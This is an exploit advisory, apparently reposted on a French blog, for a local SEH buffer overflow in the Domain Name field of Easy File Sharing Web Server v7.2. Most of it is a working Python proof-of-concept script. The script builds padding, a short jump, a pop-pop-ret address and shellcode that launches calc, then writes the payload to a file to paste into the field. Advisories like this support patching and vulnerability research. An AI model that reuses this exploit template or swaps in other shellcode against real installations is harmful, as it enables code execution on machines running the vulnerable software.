Easy File Sharing WS v7.2 – (Domain Name) Buffer Overflow Exploit

A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server v7.2. The software vulnerability allows local attackers to overwrite the registers (exp: eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The security vulnerability is marked as classic buffer overflow issue. The vulnerability is located in the `Domain Name` input field of the active directory – add domain function.

Vulnerable Module(s):
[+] Click User Account – Active Directory

Vulnerable Function(s):
[+] Add Domain

Vulnerable Input(s):
[+] Domain Name

Product & Service Introduction:
===============================

Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.). It can help you share files with your users, customers and partners. They can search for and download files from your computer or upload files from theirs. The files on your PC can be accessible from anywhere without special software. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It makes it easy for remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

(Copy of the Homepage: http://www.sharing-file.com/)

Date of Discovery:
==================

2018-09-19

Exploitation Technique:
=======================

Local & remote

Platfom Tested:
===============

Windows 7

Levels Risk :

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Easy File Sharing Web Server
2.Run the python operating script that will create a file (poc.txt)
3.Run the software « Click User Account -> Active Directory -> Add Domain -> Domain Name (Input) »
4.Paste the contents of the file (poc.txt) into the input « Domain Name » and click « OK »
5.Now the calculator executes!

#!/usr/bin/python

from struct import pack

buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("poc.txt","w")
file.write(poc)
file.close()

Réferences:
===========
[+] www.vulnerability-lab.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*